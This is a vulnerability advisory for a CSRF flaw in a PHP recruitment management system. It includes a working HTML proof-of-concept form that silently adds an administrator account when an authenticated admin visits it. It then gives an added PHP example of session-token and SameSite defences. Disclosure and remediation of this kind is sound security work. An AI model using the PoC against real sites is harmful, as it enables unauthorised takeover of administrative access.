# Exploit Title: Company's Recruitment Management System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)
# Date: 18-10-2021
# Exploit Author: Aniket Anil Deshmane
# Vendor Homepage: https://www.sourcecodester.com/php/14959/companys-recruitment-management-system-php-and-sqlite-free-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/employment_application.zip
# Version: 1
# Tested on: Windows 10, XAMPP
Detail:
The application does not use any anti-CSRF token to protect state-changing requests. Therefore, a malicious user who lures an authenticated administrator to a crafted page can add a new administrator account by submitting a forged POST request to the user-saving action.
CSRF PoC:

<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://127.0.0.1/employment_application/Actions.php?a=save_user" method="POST">
<input type="hidden" name="id" value=""/>
<input type="hidden" name="fullname" value="Test"/>
<input type="hidden" name="username" value="Test"/>
<input type="hidden" name="type" value="1"/>
<input type="submit" value="Submit request"/>
</form>
</body>
</html>
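The missing control is a synchronizer token bound to the user's session. The following is an added example of how that check could be implemented in a PHP application like this one; it is not the vendor's code, and the function names, the `csrf_token` field name and the wiring into `Actions.php` are assumptions.

```php
<?php
// Added example, not part of the advisory or the vendor's code base.
// Harden the session cookie first: SameSite keeps browsers from attaching it
// to cross-site form posts, HttpOnly keeps scripts from reading it.
session_set_cookie_params(['samesite' => 'Lax', 'httponly' => true]);
session_start();

// Issue one random token per session; every state-changing form embeds it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Reject a request whose token is missing or does not match the session copy.
// A page on another origin cannot read the victim's token, so a forged form
// like the PoC above fails here before save_user does any work.
function csrf_verify(): void
{
    $sent     = $_POST['csrf_token'] ?? '';
    $expected = $_SESSION['csrf_token'] ?? '';
    // hash_equals() compares in constant time, so the token is not leaked by timing.
    if ($expected === '' || !is_string($sent) || !hash_equals($expected, $sent)) {
        http_response_code(403);
        exit('Invalid CSRF token');
    }
}

// Assumed wiring in Actions.php: verify before the save_user branch runs.
if (($_GET['a'] ?? '') === 'save_user') {
    csrf_verify();
    // ... existing save_user logic continues here ...
}
?>
<!-- Assumed addition to the user form, next to the existing hidden fields: -->
<input type="hidden" name="csrf_token"
       value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') ?>"/>
```

Rotating the token after a successful login, and checking it on every POST handler rather than only `save_user`, closes the same gap in the application's other actions.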